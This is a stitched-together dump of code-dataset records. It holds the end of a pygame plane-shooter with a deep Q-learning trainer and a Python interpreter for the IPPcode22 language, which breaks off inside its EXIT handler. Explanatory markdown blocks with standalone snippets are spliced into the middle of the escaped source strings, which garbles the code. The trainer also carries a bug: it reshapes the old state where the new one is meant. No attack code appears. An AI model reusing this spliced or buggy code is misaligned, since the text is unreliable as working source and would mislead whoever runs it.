optimizer=Adam(lr=self.learning_rate))\n\n print(\"We finish building the model\")\n return model\n\n def train_network(self):\n # store the previous observations in replay memory\n memory = deque()\n # get the first state by doing nothing\n do_nothing = np.zeros([self.action_size])\n s_t, r_0, terminal = self.step(do_nothing)\n # In keras, need to reshape\n s_t = np.reshape(s_t, [1, self.state_size])\n\n # start training\n epsilon = 
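
The trainer below anneals epsilon linearly from `INITIAL_EPSILON` to `FINAL_EPSILON` over `EXPLORE` frames once past the `OBSERVE` phase. The schedule in isolation, using the class constants above:

```python
# Linear epsilon-greedy schedule used in train_network().
OBSERVE, EXPLORE = 3200, 300000
INITIAL_EPSILON, FINAL_EPSILON = 0.1, 0.0001

def epsilon_at(t):
    """Flat while observing, then linear decay, floored at FINAL_EPSILON."""
    if t <= OBSERVE:
        return INITIAL_EPSILON
    steps = min(t - OBSERVE, EXPLORE)
    return INITIAL_EPSILON - (INITIAL_EPSILON - FINAL_EPSILON) * steps / EXPLORE

print(epsilon_at(0), epsilon_at(OBSERVE + EXPLORE // 2), epsilon_at(10**6))
```
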
self.INITIAL_EPSILON\n t = 0\n\n for i in range(self.EPISODES):\n loss = 0\n Q_sa = 0\n action_index = 0\n r_t = 0\n a_t = np.zeros([self.action_size])\n #choose an action epsilon greedy\n if t % FRAME_PER_ACTION == 0:\n if random.random() <= epsilon:\n print(\"----------Random Action----------\")\n action_index = random.randrange(self.action_size)\n a_t[action_index] = 1\n else:\n q = self.model.predict(s_t)\n max_Q = np.argmax(q)\n action_index = max_Q\n a_t[max_Q] = 1\n\n # We reduced the epsilon gradually\n if epsilon > self.FINAL_EPSILON and t > self.OBSERVE:\n epsilon -= (self.INITIAL_EPSILON - self.FINAL_EPSILON) / self.EXPLORE\n #run the selected action and observed next state and reward\n s_t1, r_t, terminal = self.step(a_t)\n s_t1 = np.reshape(s_t, [1, self.state_size])\n\n memory.append((s_t, action_index, r_t, s_t1, terminal))\n if len(memory) > self.REPLAY_MEMORY:\n memory.popleft()\n\n # only train if down observing\n if t > self.OBSERVE:\n # sample a minibatch to train on\n minibatch = random.sample(memory, self.batch_size)\n\n # Now we do the experience replay\n state_t, action_t, reward_t, state_t1, terminal = zip(*minibatch)\n state_t = np.concatenate(state_t)\n state_t1 = np.concatenate(state_t1)\n targets = self.model.predict(state_t)\n Q_sa = self.model.predict(state_t1)\n targets[range(self.batch_size), action_t] = reward_t + self.gamma*np.max(Q_sa, axis=1)*np.invert(terminal)\n\n loss += self.model.train_on_batch(state_t, targets)\n\n s_t = s_t1\n t += 1\n\n # save progress every 1000 iterations\n if t % 1000 == 0:\n print(\"Save model\")\n self.model.save_weights(\"model.h5\", overwrite=True)\n # print info\n state = \"\"\n if t <= self.OBSERVE:\n state = \"observing\"\n elif t > self.OBSERVE and t <= self.OBSERVE + self.EXPLORE:\n state = \"exploring\"\n else:\n state = \"training\"\n\n print(\"TIMESTEP\", t, \"/ STATE\", state, \\\n \"/ EPSILON\", epsilon, \"/ ACTION\", action_index, \"/ REWARD\", r_t, \\\n \"/ Q_MAX \" , np.max(Q_sa), \"/ Loss \", loss)\n\n print(\"episode finished\")\n print(\"***********************************\")\n\n def step(self, action):\n super()._event_handler()\n pygame.display.update()\n\n self.hero.my_update(action)\n # 被击中的敌机从精灵组中删去\n # Delete the destroyed enemies from enemy sprite group\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n\n for enemy in enemies:\n self.score += 1\n\n # 更新精灵\n super()._update_sprite()\n\n # 显示得分\n # Show the score instantly\n self.score_surface = self.score_font.render(u'score = %d' % self.score, True, (0, 0, 0))\n self.screen.blit(self.score_surface, (5, 5))\n\n # 更新\n pygame.display.update()\n\n all_bullets = pygame.sprite.Group()\n for enemy in self.enemy_group:\n all_bullets.add(enemy.enemy_bullet_group)\n\n # 获得下一个状态\n # Get next state\n next_state = self.get_game_state(self.enemy_group, all_bullets)\n\n # 英雄是否被摧毁\n # If Hero is killed, terminal is TRUE; otherwise terminal is FALSE\n terminal = self.is_terminal()\n reward = 0\n\n # Hero kills enemies\n if self.is_kill():\n reward += 10\n # 英雄上方有敌机,并且没有在危险区域内的子弹\n if (next_state==self.STATE_1).all():\n reward += 5\n\n # 英雄上方有敌机,并且有在危险区域内的子弹\n elif (next_state==self.STATE_2).all():\n reward += -5\n\n # 英雄上方无敌机,并且没有在危险区域内的子弹\n elif (next_state==self.STATE_3).all():\n reward += 0\n\n # 英雄上方没有子弹,但是因为敌机的size比子弹小,存在敌机会击毁英雄的可能\n # Though there is no bullet above Hero, the enemy probably kills Hero because its smaller size than bullets\n # This is because the picture size of enemy is smaller than that of bullet\n 
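
The experience-replay branch above builds its targets as r + γ·max Q(s′, a′), zeroing the bootstrap term on terminal transitions. The same arithmetic on toy arrays:

```python
# Q-target computation from the replay update, isolated.
import numpy as np

gamma = 0.99
reward_t = np.array([10.0, -10.0])
Q_s1 = np.array([[0.2, 1.5, 0.3, 0.0, 0.1],   # Q(s', a) per sampled transition
                 [0.9, 0.4, 0.2, 0.7, 0.5]])
terminal = np.array([False, True])

targets = reward_t + gamma * np.max(Q_s1, axis=1) * np.invert(terminal)
print(targets)                                 # [11.485, -10.]
```
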
elif (next_state==self.STATE_4).all():\n reward += -5\n\n # 英雄阵亡\n # Hero is dead\n elif terminal:\n reward += -10\n\n return next_state, reward, terminal\n\n def get_game_state(self, enemies, bullets):\n enemy_above = self.hero.enemy_above(enemies)\n bullet_above = self.hero.bullet_above(enemies, bullets)\n # 状态1:英雄上方有敌机无子弹\n # STATE_1\n if enemy_above == True and bullet_above == False:\n return self.STATE_1\n # 状态2:有敌机有子弹\n # STATE_2\n elif enemy_above == True and bullet_above == True:\n return self.STATE_2\n # 状态3:无敌机无子弹\n # STATE_3\n elif enemy_above == False and bullet_above == False:\n return self.STATE_3\n # 状态4: 没有英雄正对的敌机,但是该敌机会击毁英雄,因此可以看做是子弹\n # STATE_4\n elif enemy_above == False and bullet_above == True:\n return self.STATE_4\n\n def is_terminal(self):\n # 敌机或者子弹撞毁英雄\n # Hero is killed by enemies or enemies'bullets\n enemies_killers = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)\n bullets = 0\n for one_enemy in self.enemy_group:\n bullets += len(pygame.sprite.spritecollide(self.hero, one_enemy.enemy_bullet_group, False))\n\n # 判断列表有无内容\n # If there exist enemy or bullet which collide with Hero, the game is over\n return True if len(enemies_killers) > 0 or bullets > 0 else False\n\n def is_kill(self):\n # Hero's bullets destroy enemies\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n return True if len(enemies) > 0 else False\n\n\n","repo_name":"simanw/Air-Fight-AI","sub_path":"PlaneGame.py","file_name":"PlaneGame.py","file_ext":"py","file_size_in_byte":16840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"71818566504","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n#----------------------------------------------------------------------------\n# Created By : Tadeáš Kachyňa, \n# Created Date: 19/04/2022\n# version ='1.0'\n# ---------------------------------------------------------------------------\n\"\"\" Implementation of interpret\"\"\" \n# ---------------------------------------------------------------------------\nfrom enum import IntEnum, Enum\nimport re, argparse, os, sys\nimport xml.etree.ElementTree as ET\n\n# dictionary with keys which represents number of arguments for each instruction which are displayed in the dictonary as values \n# this part is also implemented in parser / syntactic check\ninstructionNumOfArguments = {\n 0 : ('CREATEFRAME', 'PUSHFRAME', 'POPFRAME', 'RETURN', 'BREAK'),\n 1 : ('DEFVAR', 'POPS', 'CALL', 'LABEL', 'JUMP', 'PUSHS', 'WRITE', 'EXIT', 'DPRINT'),\n 2 : ('MOVE', 'INT2CHAR', 'STRLEN', 'TYPE', 'READ', 'NOT'),\n 3 : ('ADD', 'SUB', 'MUL', 'IDIV', 'LT', 'GT', 'EQ', 'JUMPIFEQ', 'JUMPIFNEQ', 'OR', 'AND', 'STRI2INT', 'CONCAT', 'GETCHAR', 'SETCHAR')\n} \n\n# dictionary with specific types of arguments for each instruction \n# this part is also implemented in parser / syntactic check\ninstructionArgumentsTypes = {\n 'CREATEFRAME' : [None, None, None],\n 'PUSHFRAME' : [None, None, None],\n 'POPFRAME' : [None, None, None],\n 'RETURN' : [None, None, None],\n 'BREAK' : [None, None, None],\n 'DEFVAR' : ['VAR', None, None],\n 'POPS' : ['VAR', None, None],\n 'CALL' : ['LABEL', None, None],\n 'LABEL' : ['LABEL', None, None],\n 'JUMP' : ['LABEL', None, None],\n 'PUSHS' : ['SYMB', None, None],\n 'WRITE' : ['SYMB', None, None],\n 'EXIT' : ['SYMB', None, None],\n 'DPRINT' : ['SYMB', None, None],\n 'MOVE' : ['VAR', 'SYMB', None],\n 'INT2CHAR' : ['VAR', 'SYMB', None],\n 'STRLEN' : ['VAR', 'SYMB', None],\n 'TYPE' : ['VAR', 'SYMB', 
None], \n 'READ' : ['VAR', 'TYPE', None],\n 'NOT' : ['VAR', 'SYMB', None],\n 'ADD' : ['VAR', 'SYMB', 'SYMB'],\n 'SUB' : ['VAR', 'SYMB', 'SYMB'],\n 'MUL' : ['VAR', 'SYMB', 'SYMB'],\n 'IDIV' : ['VAR', 'SYMB', 'SYMB'],\n 'LT' : ['VAR', 'SYMB', 'SYMB'],\n 'GT' : ['VAR', 'SYMB', 'SYMB'],\n 'EQ' : ['VAR', 'SYMB', 'SYMB'],\n 'JUMPIFEQ' : ['VAR', 'SYMB', 'SYMB'],\n 'JUMPIFNEQ' : ['VAR', 'SYMB', 'SYMB'],\n 'OR' : ['VAR', 'SYMB', 'SYMB'],\n 'AND' : ['VAR', 'SYMB', 'SYMB'],\n 'STRI2INT' : ['VAR', 'SYMB', 'SYMB'],\n 'CONCAT' : ['VAR', 'SYMB', 'SYMB'],\n 'GETCHAR' : ['VAR', 'SYMB', 'SYMB'],\n 'SETCHAR' : ['VAR', 'SYMB', 'SYMB'],\n}\n\n#### DATA STRUCTURES AND IMPORTANT VARIABLES ####\ninsNum = 0 # loop counter\nnumberOfLFs = 0 # number of Local Frames\nIsTempFrameCreated = False\nexistsTempFrame = False\nisEOF = False\ntempDict = {} # dictonary used for swapping variables between varList and varStack\nvarList = {} # dictonary for all available variables\nlabelList = {} \ndataStack = [] # stack used by instructions PUSHS and POPS\ncallList = [] # stack used by instructions CALL and RETURN\nvarStack = [] # stack for LF variables which are currenly not available\nsortedIns = []\n\nclass Val(Enum):\n NIL = 'nil'\nclass Var(IntEnum):\n VALUE = 0 \n TYPE = 1\n\nclass ProgramArgs:\n # this class takes care of program arguments, their parsing and checks correctness\n\n def __init__(self):\n self.inputToBeExecuted = None\n self._parser = None\n self._arguments = None\n self.inputToBeRead = None\n self.sourceBool = False\n self.inputBool = False\n \n def executeProgramParams(self):\n self.parseProgramsArgumets()\n self.checkProgramArguments()\n self.checkProgramsArgumentsPath()\n \n def parseProgramsArgumets(self):\n # parses arguments with argParse\n if '--help' in sys.argv and len(sys.argv) > 2: exit(10)\n if '-h' in sys.argv and len(sys.argv) > 2: exit(10)\n self._parser = argparse.ArgumentParser(description=\"IPP/2022 Interpret\")\n self._parser.add_argument(\"--source\", action=\"store\", dest=\"source\")\n self._parser.add_argument(\"--input\", action=\"store\", dest=\"input\")\n self._arguments = self._parser.parse_args()\n \n def checkProgramArguments(self):\n # checks if user entered correct arguments\n\n if self._arguments.source == None and self._arguments.input == None:\n pass #exit(10)\n elif self._arguments.source != None and self._arguments.input == None:\n self.inputToBeExecuted = self._arguments.source\n self.inputToBeRead = sys.stdin\n self.sourceBool = True\n elif self._arguments.source == None and self._arguments.input != None:\n self.inputToBeExecuted = sys.stdin\n self.inputToBeRead = open(self._arguments.input, \"r\")\n self.inputBool = True\n elif self._arguments.source != None and self._arguments.input != None:\n self.inputToBeExecuted = self._arguments.source\n self.inputToBeRead = open(self._arguments.input, \"r\")\n self.sourceBool, self.inputBool = True, True\n \n def checkProgramsArgumentsPath(self):\n # this method is checking the existence of file(s)\n\n isExists = None\n if self.sourceBool:\n isExists = os.path.exists(self._arguments.source)\n if not isExists:\n exit(11)\n if self.inputBool:\n isExists = os.path.exists(self._arguments.input)\n if not isExists:\n exit(11)\n\nclass Instruction:\n arg1, arg2, arg3 = None, None, None\n \n def __init__(self, opcode, num, arg):\n self._opcode = opcode\n self._num = num\n self._type: str\n\n self.checkOpCode()\n if(rootLength >= 1): self.arg1 = Argument(1, (arg[0].get('type')).upper(), arg[0].text)\n if(rootLength >= 2): self.arg2 = 
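
The two module-level tables above give the interpreter O(1) arity and operand-type checks. That lookup in miniature (exit codes mirror the interpreter's: 32 for bad structure, 53 for a bad operand type):

```python
# Miniature of instructionNumOfArguments / instructionArgumentsTypes and
# the validation they enable.
NUM_ARGS = {1: ('DEFVAR',), 2: ('MOVE',)}
ARG_TYPES = {'DEFVAR': ['VAR', None, None], 'MOVE': ['VAR', 'SYMB', None]}

def validate(opcode, arg_kinds):
    arity = next((n for n, ops in NUM_ARGS.items() if opcode in ops), None)
    if arity is None or arity != len(arg_kinds):
        return 32
    for got, want in zip(arg_kinds, ARG_TYPES[opcode]):
        if want == 'SYMB' and got in ('VAR', 'INT', 'STRING', 'BOOL', 'NIL'):
            continue
        if got != want:
            return 53
    return 0

print(validate('MOVE', ['VAR', 'INT']))   # 0 -- INT is a valid SYMB
print(validate('MOVE', ['VAR']))          # 32 -- wrong arity
```
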
Argument(2, (arg[1].get('type')).upper(), arg[1].text)\n if(rootLength == 3): self.arg3 = Argument(3, (arg[2].get('type')).upper(), arg[2].text)\n if self.arg1: self.arg1.check()\n if self.arg2: self.arg2.check()\n if self.arg3: self.arg3.check()\n \n def getOpcode(self):\n return self._opcode \n\n def checkOpCode(self):\n if not self._opcode in instructionNumOfArguments[self._num]:\n exit(32)\n\n\nclass Argument:\n def __init__(self, num, typ: str, value):\n self._num = num\n self._typ = typ\n self._value = value\n\n def getValue(self):\n return self._value\n \n def getType(self):\n return self._typ\n\n def checkArgumentsType(self,typ):\n if typ == self._typ or typ == 'VAR':\n pass\n elif typ == \"SYMB\" and self._typ in ('VAR', 'INT', 'STRING', 'BOOL', 'NIL'):\n pass\n elif typ == \"TYPE\" and self._typ in (\"int\", \"string\", \"bool\"):\n pass\n elif typ == 'LABEL' and self._typ == 'LABEL':\n pass\n else:\n exit(53)\n \n def check(self):\n \"\"\" Checks arguments - if variable is defined properly (in existing frame), undefined\n variables, in case we are going read from variables so they are not uninitializated. \n Escape sequentions, type conversions. \n \"\"\"\n\n self.checkArgumentsType(instructionArgumentsTypes[insOpCode][self._num-1])\n if self._typ == 'VAR' and not insOpCode == 'DEFVAR':\n if self._value.startswith('TF') and not existsTempFrame : exit(55)\n if self._value.startswith('LF') and numberOfLFs == 0 : exit(55)\n if not self._value in varList: exit(54)\n self._varName = self._value\n if not self._num == 1:\n self._typ = varList[self._value][Var.TYPE]\n self._value = varList[self._value][Var.VALUE]\n self.checkTypeConversion()\n self.replaceEscapeSequences()\n if self._value == None and insOpCode != 'TYPE': exit(56)\n\n def replaceEscapeSequences(self):\n \"\"\" This method looks for escape sequences by regex. It saves them into an array 'x'.\n Then it converts them to integers and by chr() function replaces these escape sequences\n by their queal representation in ASCII. If the string is empty this method is not performed.\n \"\"\"\n\n if self._typ == 'STRING' and self._value != None:\n x = re.findall(r\"\\\\[0-9]{3}\", self._value)\n x = [string[1:] for string in x]\n x = list(map(int, x))\n for escSeq in x:\n toReplace = '\\\\0' + str(escSeq)\n self._value = self._value.replace(toReplace, chr(escSeq))\n elif self._typ == 'STRING' and self._value == None:\n self._value = ''\n \n def checkTypeConversion(self):\n \"\"\" Converts string represented values into their real types \"\"\"\n\n if self._typ == 'INT':\n try: \n self._value = int(self._value)\n except: \n exit(32)\n elif self._typ == 'BOOL':\n if self._value == True or self._value== 'true':\n self._value = True\n else:\n self._value = False\n elif self._typ == 'NIL':\n self._value = Val.NIL\n else :\n return\n\nclass Program:\n \n sortedIns = []\n def __init__(self, treeToBeParsed):\n if os.stat(treeToBeParsed).st_size == 0:\n exit(0)\n try:\n self._tree = ET.parse(treeToBeParsed)\n except ET.ParseError:\n exit(31)\n self._root = self._tree.getroot()\n \n def executeProgram(self):\n self.checkStructionOfXMLTree()\n self.orderInstructions()\n self.findLabels()\n\n def checkStructionOfXMLTree(self):\n \"\"\" Checks the representation of XML tree. It goes intruction by instruction and\n their arguments and checks their tags and atributtes. If anything fails, the exit\n is called. 
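
`replaceEscapeSequences` above rebuilds each escape as `'\0' + str(code)` before string-replacing it, which only matches codes below 100 (`\100` would be searched for as `\0100`). A one-pass `re.sub` with a callback avoids reconstructing the escape entirely; a hedged alternative:

```python
# One-pass IPPcode22 string unescaping: \ddd (exactly three digits) -> chr(ddd).
import re

def unescape_ippcode(s):
    return re.sub(r"\\(\d{3})", lambda m: chr(int(m.group(1))), s)

print(unescape_ippcode(r"a\032b\100c"))   # 'a bdc' (032 = space, 100 = 'd')
```
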
\"\"\"\n\n try:\n for ins in self._root:\n assert ins.tag == 'instruction'\n assert ins.attrib['opcode'] \n assert ins.attrib['order'] \n numOfArgs = 0 \n for arg in ins:\n assert re.match(r\"^arg[1-3]$\", arg.tag)\n assert arg.attrib['type']\n numOfArgs = numOfArgs + 1\n assert self._root.tag == 'program'\n assert self._root.attrib['language'] \n assert self._root.get('language') == 'IPPcode22'\n except:\n exit(32)\n\n def orderInstructions(self):\n \"\"\" Sorts instructions with lambda function by their order. It looks for duplicated orders \n and non-positive values. \"\"\"\n\n try:\n sortedIns[:] = sorted(self._root, key=lambda child: (child.tag,int(child.get('order'))))\n duplicatedOrderds = []\n for ins in sortedIns:\n num = int(ins.get('order'))\n duplicatedOrderds.append(num)\n if num < 1: exit(32) # detects non-positive order numbers\n if not len(duplicatedOrderds) == len(set(duplicatedOrderds)): exit(32) # detects duplication of order numbers\n except:\n exit(32)\n\n def findLabels(self):\n \"\"\" Looks for labels and checks their uniqueness. \"\"\"\n\n cycle = 0\n for ins in self._root:\n if ins.get('opcode') == 'LABEL':\n if ins[0].text in labelList:\n exit(52)\n labelList[ins[0].text] = cycle\n cycle = cycle + 1\n\n#### PROGRAM STARTS EXECUTING HERE ####\nif __name__ == \"__main__\":\n argParse = ProgramArgs()\n argParse.executeProgramParams()\n program = Program(argParse.inputToBeExecuted)\n program.executeProgram()\n\n # main loop executing instructions\n while True:\n # tries to load new instruction and execute it, otherwise throws exit(0)\n try: \n r = sortedIns[insNum]\n except: \n exit(0)\n\n tempDict = {} # used for swapping variables between varStack and varList\n insOpCode = r.get('opcode').upper() # obtains current instruction's operation code\n rootLength = len(sortedIns[insNum]) # num of arguents\n arg = []\n arg[:] = sorted(r,key=lambda x: x.tag) # sorts arguments by their tags\n ins = Instruction(insOpCode, rootLength, arg)\n\n if ins.arg1:\n valueArg1 = ins.arg1.getValue()\n typeArg1 = ins.arg1.getType()\n if ins.arg2:\n valueArg2 = ins.arg2.getValue()\n typeArg2 = ins.arg2.getType()\n if ins.arg3:\n valueArg3 = ins.arg3.getValue()\n typeArg3 = ins.arg3.getType()\n \n # **** (INSTRUCTIONS EXECUTION) ****\n # **** Working with Frames, Functions Calls ****\n # MOVE\n if insOpCode == 'MOVE':\n varList[valueArg1][Var.VALUE] = valueArg2\n varList[valueArg1][Var.TYPE] = typeArg2\n \n # CREATEFRAME\n elif insOpCode == 'CREATEFRAME':\n if existsTempFrame: # deletes variables in current TF if it already exists\n [varList.pop(var) for var in list(varList.keys()) if var.startswith('TF')]\n IsTempFrameCreated = True \n existsTempFrame = True\n\n # PUSHFRAME\n elif insOpCode == \"PUSHFRAME\":\n if not IsTempFrameCreated: exit(55) # Undefined frame\n numberOfLFs += 1\n\n # if any LF now exists push its values to the stack and make them not available for usage\n for var in list(varList.keys()):\n if var.startswith('LF'):\n tempDict[var] = varList.pop(var)\n varStack.append(tempDict)\n\n # change every current TF to LF\n for var in list(varList.keys()):\n newKey = var.replace('TF', 'LF')\n varList[newKey] = varList.pop(var)\n \n IsTempFrameCreated = False\n existsTempFrame = False \n \n # POPFRAME\n elif insOpCode == \"POPFRAME\":\n if numberOfLFs == 0: exit(55)\n if existsTempFrame == True: # deletes variables in current TF if it already exists\n [varList.pop(var) for var in list(varList.keys()) if var.startswith('TF')]\n\n # moves current LF values to TF \n for var in 
list(varList.keys()):\n newKey = var.replace('LF', 'TF')\n varList[newKey] = varList.pop(var)\n\n # moves variables from stack to current LF, if any exists\n varList.update(varStack.pop())\n \n numberOfLFs -= 1\n IsTempFrameCreated = True\n existsTempFrame = True\n \n # DEFVAR \n elif insOpCode == 'DEFVAR':\n if valueArg1 in varList: exit(52) \n if valueArg1.startswith('TF') and existsTempFrame:\n varList[valueArg1] = [None, None]\n elif valueArg1.startswith('LF') and not numberOfLFs == 0:\n varList[valueArg1] = [None, None]\n elif valueArg1.startswith('GF'):\n varList[valueArg1] = [None , None]\n else: \n exit(55) \n\n # CALL\n elif insOpCode == 'CALL':\n if not valueArg1 in labelList: exit(52)\n callList.append(insNum)\n insNum = labelList[valueArg1] \n\n # RETURN\n elif insOpCode == 'RETURN':\n if not callList: exit(56) \n insNum = callList.pop()\n\n # **** Working with the data stack ****\n # PUSHS\n elif insOpCode == 'PUSHS':\n if typeArg1 == 'VAR':\n valueVar = varList[valueArg1][Var.VALUE]\n if valueVar == None: exit(56)\n dataStack.append([valueArg1, typeArg1])\n else:\n dataStack.append([valueArg1, typeArg1])\n\n # POPS \n elif insOpCode == 'POPS': \n if not dataStack: exit(56) \n poppedData = dataStack.pop()\n varList[valueArg1][Var.VALUE] = poppedData[Var.VALUE]\n varList[valueArg1][Var.TYPE] = poppedData[Var.TYPE]\n\n # **** Arithmetic, relational, Boolean and conversion instructions ****\n # ADD, SUB, MUL, IDIV\n elif insOpCode in ('ADD', 'SUB', 'MUL', 'IDIV'): \n if typeArg2 != 'INT' or typeArg3 != 'INT': exit(53)\n if insOpCode == 'ADD':\n varList[valueArg1][Var.VALUE] = valueArg2 + valueArg3\n elif insOpCode == 'SUB':\n varList[valueArg1][Var.VALUE] = valueArg2 - valueArg3\n elif insOpCode == 'MUL':\n varList[valueArg1][Var.VALUE] = valueArg2 * valueArg3\n elif insOpCode == 'IDIV':\n if valueArg3 == 0: exit(57)\n varList[valueArg1][Var.VALUE] = int(valueArg2 / valueArg3)\n varList[valueArg1][Var.TYPE] = 'INT'\n\n # LT, GT, EQ\n elif insOpCode in ('LT', 'GT', 'EQ'):\n if insOpCode == 'LT':\n if typeArg2 == 'NIL' or typeArg3 == 'NIL': exit(53)\n if typeArg2 != typeArg3: exit(53)\n if valueArg2 < valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n \n elif insOpCode == 'GT':\n if typeArg2 == 'NIL' or typeArg3 == 'NIL': exit(53)\n if typeArg2 != typeArg3: exit(53)\n if valueArg2 > valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n \n elif insOpCode == 'EQ':\n if typeArg2 != typeArg3:\n if typeArg2 == 'NIL' or typeArg3 == 'NIL':\n pass\n else:\n exit(53) \n if valueArg2 == valueArg3:\n varList[valueArg1][Var.VALUE] = True\n else:\n varList[valueArg1][Var.VALUE] = False\n varList[valueArg1][Var.TYPE] = 'BOOL'\n\n # AND, OR, NOT\n elif insOpCode in ('AND', 'OR', 'NOT'):\n if typeArg2 != 'BOOL': exit(53)\n if insOpCode == 'NOT':\n if valueArg2 == False:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True:\n varList[valueArg1][Var.VALUE] = False\n else:\n if typeArg3 != 'BOOL': exit(53)\n if insOpCode == 'AND':\n if valueArg2 == False and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == False and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == True and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif valueArg2 == True and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True\n if insOpCode == 'OR':\n if valueArg2 == False and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = False\n elif 
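
PUSHFRAME/POPFRAME above move variables between frames by popping each `TF@...`/`LF@...` key and reinserting it under the other prefix. That key swap, isolated (the `1` in `replace` guards against the prefix recurring later in a name):

```python
def swap_prefix(frame_vars, old='TF', new='LF'):
    for var in list(frame_vars.keys()):   # list(): the dict is mutated in the loop
        if var.startswith(old):
            frame_vars[var.replace(old, new, 1)] = frame_vars.pop(var)
    return frame_vars

print(swap_prefix({'TF@x': [1, 'INT'], 'GF@y': [None, None]}))
# {'GF@y': [None, None], 'LF@x': [1, 'INT']}
```
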
valueArg2 == False and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True and valueArg3 == False:\n varList[valueArg1][Var.VALUE] = True\n elif valueArg2 == True and valueArg3 == True:\n varList[valueArg1][Var.VALUE] = True \n varList[valueArg1][Var.TYPE] = 'BOOL' \n\n # INT2CHAR\n elif insOpCode == 'INT2CHAR': \n if typeArg2 != 'INT': exit(53)\n if not 0 < valueArg2 < 256: exit(58)\n varList[valueArg1][Var.VALUE] = chr(valueArg2)\n varList[valueArg1][Var.TYPE] = 'STRING'\n \n # STRI2INT\n elif insOpCode == 'STRI2INT':\n if typeArg2 != 'STRING' or typeArg3 != 'INT': exit(53)\n if not 0 < valueArg3 < len(valueArg2): exit(58)\n varList[valueArg1][Var.VALUE] = ord(valueArg2[valueArg3])\n varList[valueArg1][Var.TYPE] = 'INT'\n \n # **** I/O Instructions ****\n # READ\n elif insOpCode == 'READ':\n typeArg2 = (arg[1].text).upper()\n inputValue = argParse.inputToBeRead.readline() \n if not inputValue: isEOF = True\n if isEOF == False and inputValue[-1] == '\\n':\n inputValue = inputValue[:-1] # cuts the newline \n if typeArg2 == 'BOOL':\n if inputValue.lower() == 'true':\n varList[valueArg1][Var.VALUE] = True\n varList[valueArg1][Var.TYPE] = 'BOOL'\n else:\n varList[valueArg1][Var.VALUE] = False\n varList[valueArg1][Var.TYPE] = 'BOOL'\n elif typeArg2 == 'INT':\n try: \n varList[valueArg1][Var.VALUE] = int(inputValue)\n varList[valueArg1][Var.TYPE] = 'INT'\n except: \n varList[valueArg1][Var.VALUE] = Val.NIL\n varList[valueArg1][Var.TYPE] = 'NIL' \n elif typeArg2 == 'STRING' and not isEOF:\n varList[valueArg1][Var.VALUE] = inputValue\n varList[valueArg1][Var.TYPE] = 'STRING'\n else:\n varList[valueArg1][Var.VALUE] = Val.NIL\n varList[valueArg1][Var.TYPE] = 'NIL'\n\n # WRITE\n elif insOpCode == 'WRITE':\n if typeArg1 == 'VAR':\n if varList[valueArg1][Var.VALUE] == None: exit(56)\n valueArg1 = varList[valueArg1][Var.VALUE]\n valueArg1 = str(valueArg1)\n if valueArg1 == 'True': valueArg1 = 'true'\n elif valueArg1 == 'False': valueArg1 = 'false'\n elif valueArg1 == 'Val.NIL': valueArg1 = ''\n print(valueArg1, end=\"\")\n\n # **** Working with strings ****\n # CONCAT \n elif insOpCode == 'CONCAT': \n if typeArg2 != 'STRING' or typeArg3 != 'STRING': exit(53)\n varList[valueArg1][Var.VALUE] = valueArg2 + valueArg3\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # STRLEN\n elif insOpCode == 'STRLEN': \n if typeArg2 != 'STRING': exit(53)\n varList[valueArg1][Var.VALUE] = len(valueArg2)\n varList[valueArg1][Var.TYPE] = 'INT'\n\n # GETCHAR\n elif insOpCode == 'GETCHAR': \n if typeArg2 != 'STRING' or typeArg3 != 'INT': exit(53) \n lenArg2 = len(valueArg2)-1\n if valueArg3 > lenArg2 or valueArg3 < 0: exit(58)\n varList[valueArg1][Var.VALUE] = valueArg2[valueArg3]\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # SETCHAR\n elif insOpCode == 'SETCHAR':\n if varList[valueArg1][Var.VALUE] == None: exit(56)\n if varList[valueArg1][Var.TYPE] != 'STRING': exit(53)\n if typeArg2 != 'INT' or typeArg3 != 'STRING': exit(53) \n string = varList[valueArg1][Var.VALUE]\n index = valueArg3\n if len(valueArg3) == 0: exit(58)\n lenArg1 = len(varList[valueArg1][Var.VALUE]) - 1\n if valueArg2 < 0 or valueArg2 > lenArg1: exit(58) # Bad work with the string \n varList[valueArg1][Var.VALUE] = string[:valueArg2] + valueArg3[0] + string[valueArg2+1:]\n\n # **** Working with types ****\n # TYPE - dynamically detects the type of the symbol and writes a string indiciating this type to a variable\n elif insOpCode == 'TYPE':\n if typeArg2 in ('INT', 'STRING', 'BOOL', 'NIL'):\n varList[valueArg1][Var.VALUE] = 
typeArg2.lower()\n varList[valueArg1][Var.TYPE] = 'STRING'\n else:\n varList[valueArg1][Var.VALUE] = ''\n varList[valueArg1][Var.TYPE] = 'STRING'\n\n # **** Program flow control instructions ****\n # JUMP - unconditional jump\n elif insOpCode == 'JUMP':\n if not valueArg1 in labelList: exit(52) \n insNum = labelList[valueArg1]\n\n # JUMPIFEQ, JUMPIFNEQ - conditional jump\n elif insOpCode in ('JUMPIFEQ', 'JUMPIFNEQ'):\n if not valueArg1 in labelList: exit(52)\n if not typeArg2 == typeArg3:\n if typeArg2 == 'NIL' or typeArg3 == 'NIL':\n pass\n else:\n exit(53) # Bad operand types \n if insOpCode == 'JUMPIFEQ' and valueArg2 == valueArg3: \n insNum = labelList[valueArg1]\n if insOpCode == 'JUMPIFNEQ' and valueArg2 != valueArg3:\n insNum = labelList[valueArg1]\n \n # EXIT - terminates program execution\n elif insOpCode == 'EXIT':\n if typeArg1 == 'VAR':\n typeArg1 = varList[valueArg1][Var.TYPE]\n valueArg1 = varList[valueArg1][Var.VALUE]\n if valueArg1 == None : exit(56)\n if typeArg1 != 'INT' : exit(53)\n if valueArg1 